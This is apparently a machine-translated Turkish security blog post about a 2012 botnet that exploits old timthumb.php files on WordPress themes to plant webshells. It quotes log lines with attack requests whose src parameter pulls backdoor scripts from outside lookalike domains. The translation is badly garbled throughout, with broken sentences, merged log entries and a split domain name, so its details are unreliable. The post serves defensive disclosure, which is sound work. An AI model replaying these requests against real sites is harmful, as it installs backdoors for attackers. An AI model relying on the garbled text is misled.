Biz takip edilmiştir timthumb bir süre için ilgili saldırılar ve onlar tam güçle (Evet, bazı insanlar hala eski sürümlerini kullanan ve taviz alma) halen.
Sadece Mayıs ayı için, biz saldırıların bu tür ve 1.000 'den fazla IP adresleri için savunmasız olabilir siteleri tarama ile bir botnet için arka kapılar hosting 400'den fazla etki tespit.
Eğer günlükleri bakmak gibi, bu gibi nasıl görüneceğini var:
216.227.214.242 - [31/May/2012: 3:55:35 +0000]? "GET / wp-content/themes/vibrantcms/thumb.php src = http://blogger.com.nilgirisrealty.com/cok . php HTTP/1.1 "404 9347" - "" "veya112.78.3.167 - [31/May/2012: 3:45:50 +0000] "GET HTTP/1.1 "404 305" - "" "
Temel olarak eski timthumb.php etkin ve http://img.youtube.com.spectra-entertainment.com/upload.php ve http://blogger gelen arka kapılar eklemek için çalışıyor olabilir site başına temalar yüzlerce arıyor. com.nilgirisrealty.com / üzerinde cok.php.
Arka kapı hosting etki tam listesini laboratuvarlarımızda yazılan açık:
Timthumb saldırılar için etki hosting webshells
Hiç yorum yok:
Yorum Gönder